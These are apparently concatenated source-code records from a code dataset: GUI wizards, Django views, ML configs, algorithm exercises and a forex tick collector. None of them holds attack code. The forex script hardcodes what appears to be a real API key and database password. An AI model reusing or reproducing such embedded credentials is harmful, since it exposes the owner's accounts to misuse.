+{"seq_id":"342956472","text":"\n__author__ = 'tom1231'\n\n\nfrom BAL.Interface.GUIWizard import GUIWizard\nfrom Tkinter import *\nfrom tkMessageBox import showerror\nfrom lxml.etree import SubElement\nimport webbrowser\n\n\nclass HokuyoWizard(GUIWizard):\n @staticmethod\n def displayData(data):\n info = 'Element Type: ' + data['elType'] + '\\n'\n info += 'Output: ' + data['output'] + '\\n'\n info += 'Port: ' + data['port'] + '\\n'\n info += 'Frame id: ' + data['frameId'] + '\\n'\n return info\n\n def editWizard(self, data):\n frame = Frame(self.master)\n name = Label(frame, text='Name:')\n output = Label(frame, text='Output:')\n port = Label(frame, text='Port:')\n frameId = Label(frame, text='Frame id:')\n\n self.name = Entry(frame)\n self.name.insert(END, data['name'])\n self.output = Entry(frame)\n self.output.insert(END, data['output'])\n self.port = Entry(frame)\n self.port.insert(END, data['port'])\n self.frameId = Entry(frame)\n self.frameId.insert(END, data['frameId'])\n\n add = Button(frame, text='Add', command=self.add)\n cancel = Button(frame, text='Cancel', command=self.cancel)\n\n name.grid(sticky=W)\n output.grid(sticky=W)\n port.grid(sticky=W)\n frameId.grid(sticky=W)\n add.grid(sticky=W)\n\n self.name.grid(row=0, column=1, sticky=E)\n self.output.grid(row=1, column=1, sticky=E)\n self.port.grid(row=2, column=1, sticky=E)\n self.frameId.grid(row=3, column=1, sticky=E)\n cancel.grid(row=4, column=1, sticky=E)\n\n hypLink = Label(frame, text='See hokuyo default arguments', fg='blue', cursor='hand2')\n hypLink.bind('', self.hrfCallBack)\n hypLink.grid()\n\n frame.pack()\n return self.finish\n\n def nameIsValid(self):\n for i in xrange(len(self.names)):\n if self.name.get() == self.names[i] and i != self.place:\n return False\n return True\n\n def createWizard(self, itemAvailable=None):\n frame = Frame(self.master)\n name = Label(frame, text='Name:')\n output = Label(frame, text='Output:')\n port = Label(frame, text='Port:')\n frameId = Label(frame, text='Frame id:')\n\n self.name = Entry(frame)\n self.name.insert(0, 'Hokuyo_Node')\n self.output = Entry(frame)\n self.output.insert(0, 'screen')\n self.port = Entry(frame)\n self.port.insert(0, '/dev/Hokuyo')\n self.frameId = Entry(frame)\n self.frameId.insert(0, 'Hokuyo_Frame')\n\n add = Button(frame, text='Add', command=self.add)\n cancel = Button(frame, text='Cancel', command=self.cancel)\n\n name.grid(sticky=W)\n output.grid(sticky=W)\n port.grid(sticky=W)\n frameId.grid(sticky=W)\n add.grid(sticky=W)\n\n self.name.grid(row=0, column=1, sticky=E)\n self.output.grid(row=1, column=1, sticky=E)\n self.port.grid(row=2, column=1, sticky=E)\n self.frameId.grid(row=3, column=1, sticky=E)\n cancel.grid(row=4, column=1, sticky=E)\n\n hypLink = Label(frame, text='See hokuyo default arguments', fg='blue', cursor='hand2')\n hypLink.bind('', self.hrfCallBack)\n hypLink.grid()\n\n frame.pack()\n return self.finish\n\n def hrfCallBack(self, event):\n webbrowser.open('http://wiki.ros.org/hokuyo_node')\n\n def getData(self):\n return self.text, self.element, self.data\n\n def __init__(self, parent, icon, names, place=-1):\n GUIWizard.__init__(self, icon)\n self.element = None\n self.text = None\n self.master = Toplevel()\n self.master.tk.call('wm', 'iconphoto', self.master._w, self.icon)\n self.finish = BooleanVar()\n self.parent = parent\n self.data = dict()\n self.master.protocol('WM_DELETE_WINDOW', self.close)\n self.names = names\n self.place = place\n\n def close(self):\n self.cancel()\n # showerror(title='Error', message='please use the cancel button to exit.')\n\n def add(self):\n if self.nameIsValid():\n self.data['elType'] = 'Hokuyo'\n self.data['name'] = self.name.get()\n self.data['output'] = self.output.get()\n self.data['port'] = self.port.get()\n self.data['frameId'] = self.frameId.get()\n self.element = SubElement(self.parent, 'node', {\n 'pkg': 'hokuyo_node',\n 'type': 'hokuyo_node',\n 'name': self.name.get(),\n 'output': self.output.get()\n })\n SubElement(self.element, 'param', {\n 'name': 'port',\n 'value': self.port.get()\n })\n SubElement(self.element, 'param', {\n 'name': 'frame_id',\n 'value': self.frameId.get()\n })\n self.text = self.name.get()\n self.finish.set(True)\n self.master.destroy()\n else:\n showerror(title='Error', message='Name is already taken.')\n\n def cancel(self):\n self.finish.set(False)\n self.master.destroy()","sub_path":"ric/ric_board/scripts/RiC_Gui/BAL/DevicesRows/HokuyoWizard.py","file_name":"HokuyoWizard.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"654541537","text":"from morse_dict import morse_dict\r\n\r\n\r\ndef morse_decoder(ugga):\r\n ausgabe = \"\"\r\n\r\n index = 0\r\n while index < len(ugga):\r\n\r\n pause = ugga.find('___', index)\r\n\r\n if pause > -1:\r\n if ugga[index:pause + 4] == \"____\":\r\n pause = pause + 4\r\n ausgabe += \" \"\r\n else:\r\n pause = pause + 3\r\n zeichen = ugga[index:pause]\r\n for key, value in morse_dict.items():\r\n if zeichen == value:\r\n ausgabe += key\r\n break\r\n\r\n index = pause\r\n else:\r\n index = len(ugga)\r\n\r\n return ausgabe\r\n\r\n\r\ndef morse_encoder(ugga):\r\n ausgabe = \"\"\r\n\r\n for char in ugga:\r\n if char in morse_dict.keys():\r\n ausgabe += morse_dict[char]\r\n\r\n return ausgabe\r\n","sub_path":"imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646662911","text":"from guizero import App, Picture, Window, Box, Text, TextBox, PushButton, ListBox\nfrom time import sleep\nimport globals\nfrom windows.main_window import main_window\nfrom windows.splash_window import splash_window\nfrom windows.basic_info_window import basic_info_window\nfrom windows.basic_stats_window import basic_stats_window\nfrom windows.skill_window import skill_window\nfrom windows.inventory_window import inventory_window\nfrom windows.weapon_window import weapon_window\nfrom windows.spell_window import spell_window\nfrom windows.lpft_window import lpft_window\nfrom windows.settings_window import settings_window\nfrom windows.update_window import update_window\nimport sys\nimport os\n\n# Event handlers to open and refresh correct windows\ndef show_basic_info_window():\n if globals.character_selected:\n globals.basic_info_window.window.show()\ndef show_basic_stats_window():\n if globals.character_selected:\n globals.basic_stats_window.window.show()\ndef show_skill_window():\n if globals.character_selected:\n globals.skill_window.window.show()\ndef show_inventory_window():\n if globals.character_selected:\n globals.inventory_window.window.show()\ndef show_lpft_window():\n if globals.character_selected:\n globals.lpft_window.window.show()\ndef show_weapon_window():\n if globals.character_selected:\n globals.weapon_window.window.show()\ndef show_spell_window():\n if globals.character_selected:\n globals.spell_window.window.show()\ndef show_settings_window():\n globals.settings_window.window.show()\n\n# Loading global variables\nglobals.initialize()\n\n# Main application object\nglobals.main_window = main_window()\n\n# Splash window\nsplash_window = splash_window(globals.main_window.app)\n\nsplash_window.update_load()\n\n# Building main application widgets\nglobals.main_window.build()\n\nsplash_window.update_load()\n\n# Basic Info Window\nglobals.basic_info_window = basic_info_window(globals.main_window.app)\nglobals.main_window.msbuttons[0].when_clicked = show_basic_info_window\nglobals.basic_info_window.window.hide()\n\nsplash_window.update_load()\n\n# Basic Stats Window\nglobals.basic_stats_window = basic_stats_window(globals.main_window.app)\nglobals.main_window.msbuttons[1].when_clicked = show_basic_stats_window\nglobals.basic_stats_window.window.hide()\n\nsplash_window.update_load()\n\n# Attributes/Skills Window\nglobals.skill_window = skill_window(globals.main_window.app)\nglobals.main_window.msbuttons[2].when_clicked = show_skill_window\nglobals.skill_window.window.hide()\n\nsplash_window.update_load()\n\n# Inventory Window\nglobals.inventory_window = inventory_window(globals.main_window.app)\nglobals.main_window.msbuttons[3].when_clicked = show_inventory_window\nglobals.inventory_window.window.hide()\n\nsplash_window.update_load()\n\n# Texty Window (LPFT)\nglobals.lpft_window = lpft_window(globals.main_window.app)\nglobals.main_window.msbuttons[4].when_clicked = show_lpft_window\nglobals.lpft_window.window.hide()\n\nsplash_window.update_load()\n\n# Weapon Window\nglobals.weapon_window = weapon_window(globals.main_window.app)\nglobals.main_window.msbuttons[5].when_clicked = show_weapon_window\nglobals.weapon_window.window.hide()\n\nsplash_window.update_load()\n\n# Spell Window\nglobals.spell_window = spell_window(globals.main_window.app)\nglobals.main_window.msbuttons[6].when_clicked = show_spell_window\nglobals.spell_window.window.hide()\n\nsplash_window.update_load()\n\n# Settings Window\nglobals.settings_window = settings_window(globals.main_window.app)\nglobals.main_window.msbuttons[7].when_clicked = show_settings_window\nglobals.settings_window.window.hide()\n\n# Update Window\nglobals.update_window = update_window(globals.main_window.app)\n\n# Selecting character sheet\nglobals.settings_window.load_window.show()\n\n# Deleting splash screen, freeing memory\nsplash_window.window.destroy()\n\n# Starting application\nglobals.main_window.app.display()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"245793414","text":"from django import http\nfrom django.views import generic\nfrom careers import models\n\n\n\ndef format_threshold(n):\n return (\"{0}−\" if n < 0 else \"{0}+\").format(abs(n))\n\ndef gather_table(table):\n # hurrah for duck-typing\n return [(x.throw, x.content) for x in table.entries.all()]\n\n\n\nclass FrontView(generic.ListView):\n queryset = models.Career.objects.filter(active=True)\n template_name = \"careers/front.html\"\n\nclass DetailView(generic.DetailView):\n queryset = models.Career.objects.filter(active=True)\n template_name = \"careers/detail.html\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n career = context['object']\n if career.enlistment_special != \"soc10plus\":\n context['enlistment_throw'] = format_threshold(career.enlistment_throw)\n context['enlistment_stat1'] = career.get_enlistment_DM_1_stat_display()\n context['enlistment_if1'] = format_threshold(career.enlistment_DM_1_threshold)\n context['enlistment_stat2'] = career.get_enlistment_DM_2_stat_display()\n context['enlistment_if2'] = format_threshold(career.enlistment_DM_2_threshold)\n context['survival_throw'] = format_threshold(career.survival_throw)\n if career.survival_DM_2_stat:\n context['survival_stat2'] = career.get_survival_DM_2_stat_display()\n context['survival_if2'] = format_threshold(career.survival_DM_2_threshold)\n context['reenlistment'] = format_threshold(career.reenlist_throw)\n pdev = gather_table(career.personal_development_table)\n ssk = gather_table(career.service_skills_table)\n ed = gather_table(career.education_table)\n aed = gather_table(career.advanced_education_table)\n context['skills'] = [{\n 'throw': i + 1,\n 'pdev': pdev[i][1],\n 'ssk': ssk[i][1],\n 'ed': ed[i][1],\n 'aed': aed[i][1],\n } for i in range(6)]\n benefits = gather_table(career.benefits_table)\n cash = gather_table(career.cash_table)\n context['muster_out'] = [{\n 'throw': i + 1,\n 'benefit': benefits[i][1] if len(benefits) > i else \"\",\n 'cash': cash[i][1] if len(cash) > i else \"\",\n } for i in range(max(len(benefits), len(cash)))]\n try:\n rank_data = career.rankedcareer\n context['position_label'] = \"Commission\" if rank_data.military else \"Position\"\n context['position_throw'] = format_threshold(rank_data.position_throw)\n context['position_stat1'] = rank_data.get_position_DM_1_stat_display()\n context['position_if1'] = format_threshold(rank_data.position_DM_1_threshold)\n context['promotion_throw'] = format_threshold(rank_data.promotion_throw)\n context['promotion_stat1'] = rank_data.get_promotion_DM_1_stat_display()\n context['promotion_if1'] = format_threshold(rank_data.promotion_DM_1_threshold)\n context['ranks'] = [{\n 'value': x.value,\n 'title': x.title,\n } for x in rank_data.ranks.all()]\n context['rank_skills'] = [{\n 'title': x.title,\n 'skill': x.skill,\n } for x in rank_data.ranks.exclude(skill=None)]\n except models.RankedCareer.DoesNotExist:\n pass\n return context\n\nclass VersionDetailView(DetailView):\n def get_queryset(self):\n qs = models.Career.objects.filter(slug=self.kwargs['slug'],\n version=self.kwargs['version'])\n if qs.count() < 1:\n raise http.Http404\n return qs\n","sub_path":"careers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584085032","text":"import numpy as np\n\n# Yolo parameter\nyolo_anchors = np.array([(10, 13), (16, 30), (33, 23), (30, 61), (62, 45),\n (59, 119), (116, 90), (156, 198), (373, 326)],\n np.float32)\nyolo_anchor_masks = np.array([[6, 7, 8], [3, 4, 5], [0, 1, 2]])\nyolo_tiny_anchors = np.array([(10, 14), (23, 27), (37, 58),\n (81, 82), (135, 169), (344, 319)],\n np.float32)\nyolo_tiny_anchor_masks = np.array([[3, 4, 5], [0, 1, 2]])\n\n# Yolo setting\nsize_h = 416\nsize_w = 416\n\n# Training setting\ntiny = False\nif tiny:\n step1_batch_size = 32\n step1_learning_rate = 1e-3\n step1_start_epochs = 0\n step1_end_epochs = 50\n step2_batch_size = 14\n step2_learning_rate = 1e-4\n step2_start_epochs = 50\n step2_end_epochs = 100\nelse:\n step1_batch_size = 32\n step1_learning_rate = 1e-3\n step1_start_epochs = 0\n step1_end_epochs = 100\n step2_batch_size = 8\n step2_learning_rate = 1e-4\n step2_start_epochs = step1_end_epochs\n step2_end_epochs = step1_end_epochs + 100\n\n# Pre-Train weights\nyolo_weights = 'model_data/yolo_weights.h5'\nyolo_tiny_weights = 'model_data/yolo_tiny_weights.h5'\n\n# Our Yolo weights\nyolo_voc_weights = 'logs_yolo/models/best_011.h5'\nyolo_coco_weights = 'logs_yolo/models/best_001.h5'\n\ncoco_classes = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\n 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard',\n 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard',\n 'cell phone', 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',\n 'scissors', 'teddy bear', 'hair drier', 'toothbrush']\nvoc_classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',\n 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']","sub_path":"Lab12/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176574331","text":"import os\nimport sys\nimport asyncio\nimport nest_asyncio\nimport json\nfrom dotenv import load_dotenv\nfrom datetime import datetime\n\n# from wss.wss_binance import binance_async\nfrom wss.wss_12data import twelvedata_async\nfrom db.db_pool import get_pool\nfrom db.db_insert import insert2db\n\ndef subscribe_event(symbols):\n return {\n \"action\": \"subscribe\",\n \"params\": {\n \"symbols\": \",\".join(list(symbols))\n }\n }\n\n\ndef main() -> None:\n ###\n CURRENCY_PAIRS = ['AUD/USD', 'CAD/USD', 'CHF/USD', 'EUR/USD', 'GBP/USD', 'NZD/USD', 'USD/AUD', \n 'USD/CAD', 'USD/CHF', 'USD/EUR', 'USD/GBP', 'USD/JPY', 'USD/NZD', 'AUD/CAD', 'AUD/CHF', \n 'AUD/EUR', 'AUD/GBP', 'AUD/JPY', 'AUD/NZD', 'CAD/AUD', 'CAD/CHF', \n 'CAD/COP', 'CAD/EUR', 'CAD/GBP', 'CAD/JPY', 'CAD/NZD', 'CHF/AUD', 'CHF/CAD', 'CHF/EUR', \n 'CHF/GBP', 'CHF/JPY', 'CHF/NZD', 'EUR/AOA', 'EUR/AUD', 'EUR/CAD', 'EUR/CHF', \n 'EUR/GBP', 'EUR/JPY', 'EUR/NZD', 'GBP/AUD', 'GBP/CAD', 'GBP/CHF', \n 'GBP/EUR', 'GBP/JPY', 'GBP/NZD', 'JPY/CHF', 'NZD/AUD', 'NZD/CAD', 'NZD/CHF', 'NZD/EUR',\n 'NZD/GBP', 'NZD/JPY', 'USD/RUB', 'CZK/PLN'\n ] # Use this one for hourly & minutes - removed 'BHD/INR', 'USD/AOA' due to small datasets. \n # Needs to remove 'CAD/COP', 'EUR/AOA', 'CZK/PLN' as well due to no where to download historical tick data\n\n symbols = CURRENCY_PAIRS # ['AUD/USD', 'CAD/USD']\n\n ###\n # load_dotenv()\n\n subscribe = json.dumps(subscribe_event(symbols))\n print(datetime.utcnow(), ': Subscribe:', subscribe)\n\n ###\n # socket = f\"wss://stream.binance.com:9443/ws/{pair}@aggTrade\"\n socket = f\"wss://ws.twelvedata.com/v1/quotes/price?apikey=7b742df1fccc4f428fa53aef377c05ab\"\n ###\n\n # PGPASSWORD = os.environ.get(\"PGPASSWORD\")\n # PGHOST = os.environ.get(\"PGHOST\")\n # print(PGPASSWORD, PGHOST)\n\n dsn = f\"postgres://postgres:st0plessA!@localhost:5432/market_data\"\n table = f'ticks'\n\n while True:\n pool = get_pool(dsn, asyncio.get_event_loop())\n insert2db_async = lambda msg: insert2db(msg, \n pool=pool, \n table=table)\n \n asyncio.get_event_loop().run_until_complete(\n twelvedata_async(socket=socket, \n subscribe=subscribe,\n insert2db=insert2db_async)\n )\n asyncio.get_event_loop().run_until_complete(pool.close())\n\nif __name__ == \"__main__\":\n main()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"127192333","text":"'''\n1. You are given a number n, representing the number of rows.\n2. You are given a number m, representing the number of columns.\n3. You are given n*m numbers, representing elements of 2d array a, which represents a gold mine.\n4. You are allowed to take one step left, right, up or down from your current position.\n5. You can't visit a cell with 0 gold and the same cell more than once. \n6. Each cell has a value that is the amount of gold available in the cell.\n7. You are required to identify the maximum amount of gold that can be dug out from the mine if \n you start and stop collecting gold from any position in the grid that has some gold.\n \n \nSample Input:\n\n6\n6\n\n0 1 4 2 8 2\n4 3 6 5 0 4\n1 2 4 1 4 6\n2 0 7 3 2 2\n3 1 5 9 2 4\n2 7 0 8 5 1\n\nSample Output:\n\n120\n\nhttps://www.youtube.com/watch?v=lNwXq3Ki32I&list=PL-Jc9J83PIiHO9SQ6lxGuDsZNt2mkHEn0&index=7\n\n\n'''\n\ndef travelAndCollect(arr, i, j, visited, bag):\n \n if(i < 0 or j < 0 or i >= len(arr) or j >= len(arr[0]) or arr[i][j] == 0 or visited[i][j] == True):\n return\n \n visited[i][j] = True\n bag.append(arr[i][j])\n travelAndCollect(arr, i-1, j, visited, bag) # call for north\n travelAndCollect(arr, i, j+1, visited, bag) # call for east\n travelAndCollect(arr, i+1, j, visited, bag) # call for south\n travelAndCollect(arr, i, j-1, visited, bag) # call for west\n \n \ndef getMaxGold(arr):\n \n maxx = 0\n \n visited = [[False for j in range(len(arr))] for i in range(len(arr))]\n \n for i in range(len(arr)):\n for j in range(len(arr[0])):\n if(visited[i][j] == False and arr[i][j] != 0):\n bag = []\n travelAndCollect(arr, i, j, visited, bag)\n \n # take count of all visited cells\n summ = 0\n for val in bag:\n summ += val\n\n if(summ > maxx):\n maxx = summ\n \n return maxx\n\narr = [ \n [0, 1, 4, 2, 8, 2],\n [4, 3, 6, 5, 0, 4],\n [1, 2, 4, 1, 4, 6],\n [2, 0, 7, 3, 2, 2],\n [3, 1, 5, 9, 2, 4],\n [2, 7, 0, 8, 5, 1]\n ]\n\nprint(getMaxGold(arr))","sub_path":"pepcoding/backtracking/5_Gold_Mine_2.py","file_name":"5_Gold_Mine_2.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615777191","text":"#!/usr/bin/python3\n\"\"\"\nPrints the State object with the name passed as argument\nfrom the database hbtn_0e_6_usa.\n\"\"\"\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1],\n sys.argv[2],\n sys.argv[3]),\n pool_pre_ping=True)\n\n Session = sessionmaker(engine)\n session = Session()\n\n adding_state = State(name=\"Louisiana\")\n query = session.add(adding_state)\n session.commit()\n print(adding_state.id)\n\n session.close()\n","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"477148372","text":"# ------------------------------------------------------------------------------------------------ #\n# MIT License #\n# #\n# Copyright (c) 2020, Microsoft Corporation #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software #\n# and associated documentation files (the \"Software\"), to deal in the Software without #\n# restriction, including without limitation the rights to use, copy, modify, merge, publish, #\n# distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the #\n# Software is furnished to do so, subject to the following conditions: #\n# #\n# The above copyright notice and this permission notice shall be included in all copies or #\n# substantial portions of the Software. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING #\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, #\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #\n# ------------------------------------------------------------------------------------------------ #\n\nfrom functools import partial\n\nimport jax\nimport jax.numpy as jnp\nimport haiku as hk\n\nfrom .._base.test_case import TestCase\nfrom ..utils import get_transition_batch, safe_sample\nfrom .v import V\n\n\ndef func(S, is_training):\n rng1, rng2, rng3 = hk.next_rng_keys(3)\n rate = 0.25 if is_training else 0.\n batch_norm = hk.BatchNorm(False, False, 0.99)\n seq = hk.Sequential((\n hk.Flatten(),\n hk.Linear(8), jax.nn.relu,\n partial(hk.dropout, rng1, rate),\n partial(batch_norm, is_training=is_training),\n hk.Linear(8), jax.nn.relu,\n partial(hk.dropout, rng2, rate),\n partial(batch_norm, is_training=is_training),\n hk.Linear(8), jax.nn.relu,\n partial(hk.dropout, rng3, rate),\n partial(batch_norm, is_training=is_training),\n hk.Linear(1, w_init=jnp.zeros), jnp.ravel,\n ))\n return seq(S)\n\n\nclass TestV(TestCase):\n\n def setUp(self):\n self.v = V(func, self.env_discrete, random_seed=13)\n self.transition_batch = get_transition_batch(self.env_discrete, random_seed=7)\n\n def tearDown(self):\n del self.v, self.transition_batch\n\n def test_call(self):\n s = safe_sample(self.env_discrete.observation_space)\n v = self.v(s)\n self.assertAlmostEqual(v, 0.)\n\n def test_soft_update(self):\n tau = 0.13\n v = self.v\n v_targ = v.copy()\n v.params = jax.tree_map(jnp.ones_like, v.params)\n v_targ.params = jax.tree_map(jnp.zeros_like, v.params)\n expected = jax.tree_map(lambda a: jnp.full_like(a, tau), v.params)\n v_targ.soft_update(v, tau=tau)\n self.assertPytreeAlmostEqual(v_targ.params, expected)\n\n def test_function_state(self):\n print(self.v.function_state)\n batch_norm_avg = self.v.function_state['batch_norm/~/mean_ema']['average']\n self.assertArrayShape(batch_norm_avg, (1, 8))\n self.assertArrayNotEqual(batch_norm_avg, jnp.zeros_like(batch_norm_avg))\n\n def test_bad_input_signature(self):\n def badfunc(S, is_training, x):\n pass\n msg = (\n r\"func has bad signature; \"\n r\"expected: func\\(S, is_training\\), got: func\\(S, is_training, x\\)\")\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n\n def test_bad_output_type(self):\n def badfunc(S, is_training):\n return 'garbage'\n msg = r\"(?:is not a valid JAX type|func has bad return type)\"\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n\n def test_bad_output_shape(self):\n def badfunc(S, is_training):\n V = func(S, is_training)\n return jnp.expand_dims(V, axis=-1)\n msg = r\"func has bad return shape, expected: \\(1,\\), got: \\(1, 1\\)\"\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n\n def test_bad_output_dtype(self):\n def badfunc(S, is_training):\n V = func(S, is_training)\n return V.astype('int32')\n msg = r\"func has bad return dtype; expected a subdtype of jnp\\.floating, got dtype=int32\"\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n","sub_path":"coax/_core/v_test.py","file_name":"v_test.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"20307627","text":"\"\"\"\nUses the Noembed_ oEmbed service to embed (almost) arbitrary URLs.\n\nDepends on requests_.\n\"\"\"\n\nfrom hashlib import md5\n\nfrom django import forms\nfrom django.core.cache import cache\nfrom django.db import models\nfrom django.utils.html import mark_safe\nfrom django.utils.translation import ugettext, ugettext_lazy as _\n\nimport requests\nfrom content_editor.admin import ContentEditorInline\n\n\n__all__ = ('External', 'ExternalInline', 'oembed_html', 'render_external')\n\n\ndef oembed_html(url, cache_failures=True):\n \"\"\"\n Asks Noembed_ for the embedding HTML code for arbitrary URLs. Sites\n supported include Youtube, Vimeo, Twitter and many others.\n\n Successful embeds are always cached for 30 days.\n\n Failures are cached if ``cache_failures`` is ``True`` (the default). The\n durations are as follows:\n\n - Connection errors are cached 60 seconds with the hope that the connection\n failure is only transient.\n - HTTP errors codes and responses in an unexpected format (no JSON) are\n cached for 24 hours.\n\n The return value is always either a HTML fragment or an empty string.\n \"\"\"\n # Thundering herd problem etc...\n key = 'oembed-url-%s' % md5(url.encode('utf-8')).hexdigest()\n html = cache.get(key)\n if html is not None:\n return html\n\n try:\n html = requests.get(\n 'https://noembed.com/embed',\n params={\n 'url': url,\n 'nowrap': 'on',\n 'maxwidth': 1200,\n 'maxheight': 800,\n },\n timeout=2,\n ).json().get('html', '')\n except (requests.ConnectionError, requests.ReadTimeout):\n # Connection failed? Hopefully temporary, try again soon.\n if cache_failures:\n cache.set(key, '', timeout=60)\n return ''\n except (ValueError, requests.HTTPError):\n # Oof... HTTP error code, or no JSON? Try again tomorrow,\n # and we should really log this.\n if cache_failures:\n cache.set(key, '', timeout=86400)\n return ''\n else:\n # Perfect, cache for 30 days\n cache.set(key, html, timeout=30 * 86400)\n return html\n\n\ndef render_external(plugin, **kwargs):\n \"\"\"\n Render the plugin, embedding it in the appropriate markup for Foundation's\n flex-video element (http://foundation.zurb.com/sites/docs/flex-video.html)\n \"\"\"\n\n html = oembed_html(plugin.url)\n if 'youtube.com' in html:\n return mark_safe(\n '
{}
'.format(html))\n if 'vimeo.com' in html:\n return mark_safe(\n '
{}
'.format(html))\n return mark_safe(html)\n\n\nclass External(models.Model):\n \"\"\"\n External content plugin\n \"\"\"\n url = models.URLField(_('URL'))\n\n class Meta:\n abstract = True\n verbose_name = _('external content')\n\n def __str__(self):\n return self.url\n\n\nclass ExternalForm(forms.ModelForm):\n \"\"\"\n Tries fetching the oEmbed code for the given URL when cleaning form data\n \"\"\"\n def clean(self):\n data = super(ExternalForm, self).clean()\n url = data.get('url')\n if url and not oembed_html(url, cache_failures=False):\n raise forms.ValidationError(\n ugettext('Unable to fetch HTML for this URL, sorry!')\n )\n return data\n\n\nclass ExternalInline(ContentEditorInline):\n \"\"\"\n Content editor inline using the ``ExternalForm`` to verify whether the\n given URL is embeddable using oEmbed or not.\n \"\"\"\n form = ExternalForm\n","sub_path":"feincms3/plugins/external.py","file_name":"external.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"154740947","text":"# @Time : 2021/6/21 14:58\n# @Author : WZG\n# --coding:utf-8--\n\n# 添加节点与邻居\ngraph = {}\ngraph[\"start\"] = {}\ngraph[\"start\"][\"a\"] = 5\ngraph[\"start\"][\"b\"] = 2\n\ngraph[\"a\"] = {}\ngraph[\"a\"][\"c\"] = 4\ngraph[\"a\"][\"d\"] = 2\n\ngraph[\"b\"] = {}\ngraph[\"b\"][\"a\"] = 8\ngraph[\"b\"][\"d\"] = 7\n\ngraph[\"c\"] = {}\ngraph[\"c\"][\"d\"] = 6\ngraph[\"c\"][\"fin\"] = 3\n\ngraph[\"d\"] = {}\ngraph[\"d\"][\"fin\"] = 1\n\ngraph[\"fin\"] = {}\n\n# 添加散列表来存储每个节点的开销。\ninfinity = float(\"inf\")\ncosts = {}\ncosts[\"a\"] = 5\ncosts[\"b\"] = 2\ncosts[\"c\"] = infinity\ncosts[\"d\"] = infinity\ncosts[\"fin\"] = infinity\n\n\n# 存储父节点的散列表\nparents = {}\nparents[\"a\"] = \"start\"\nparents[\"b\"] = \"start\"\nparents[\"c\"] = None\nparents[\"d\"] = None\nparents[\"fin\"] = None\n\n# 数组存储处理过的节点\nprocessed = []\n\n\ndef fin_lowest_cost_node(costs):\n lowest_cost = float(\"inf\")\n lowest_cost_node = None\n for node in costs: # 遍历所有的节点\n cost = costs[node]\n if cost < lowest_cost and node not in processed: # 如果当前节点的开销更低且未处理过,\n lowest_cost = cost # 就将其视为开销最低的节点\n lowest_cost_node = node\n return lowest_cost_node\n\n\nnode = fin_lowest_cost_node(costs) # 在未处理的节点中找出开销最小的节点\nwhile node is not None: # 这个while循环在所有节点都被处理过后结束\n cost = 